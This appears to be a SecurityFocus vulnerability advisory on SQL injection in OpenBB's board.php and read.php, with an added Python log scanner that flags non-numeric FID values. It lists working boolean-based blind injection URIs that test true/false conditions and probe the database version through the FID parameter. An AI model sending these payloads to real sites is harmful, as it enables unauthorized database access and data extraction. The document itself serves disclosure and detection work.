OpenBB Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/board.php?FID=3+and+1=1 >>> True
http://www.example.com/board.php?FID=3+and+1=2 >>> False
http://www.example.com/board.php?FID=3+and+substring(@@version,1,1)=5 >>> True
http://www.example.com/board.php?FID=3+and+substring(@@version,1,1)=4 >>> False
http://www.example.com/read.php?FID=3+and+1=1 >>> True
http://www.example.com/read.php?FID=3+and+1=2 >>> False
http://www.example.com/read.php?FID=3+and+substring(@@version,1,1)=5 >>> True
http://www.example.com/read.php?FID=3+and+substring(@@version,1,1)=4 >>> False
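
Added example (not part of the original advisory or of OpenBB): a log check that flags requests to board.php or read.php whose decoded FID value is not a plain integer, which is the pattern all of the URIs above share. It assumes common/combined-format access logs; the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameter named in the advisory's example URIs.
AFFECTED_SCRIPTS = {"board.php", "read.php"}
PARAM = "FID"

# Client address and request target of a common/combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_fid(target):
    """Return the decoded FID value if it is not a plain integer, else None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] not in AFFECTED_SCRIPTS:
        return None
    # parse_qs decodes '+' and %XX, so encoded variants are normalised first.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(lines):
    """Return a list of (client, target, decoded_value) for flagged requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        value = suspicious_fid(m.group("target"))
        if value is not None:
            hits.append((m.group("client"), m.group("target"), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /board.php?FID=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /board.php?FID=3+and+1=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:06 +0000] "GET /read.php?FID=3%20and%201=2 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /read.php?FID=12 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?FID=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, target, value in scan(SAMPLE_LOG):
        print(f"{client} sent non-numeric FID {value!r} in {target}")
```

The same digits-only test, applied server-side before FID reaches a query, rejects every URI listed above.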


 

Copyright 2010, SecurityFocus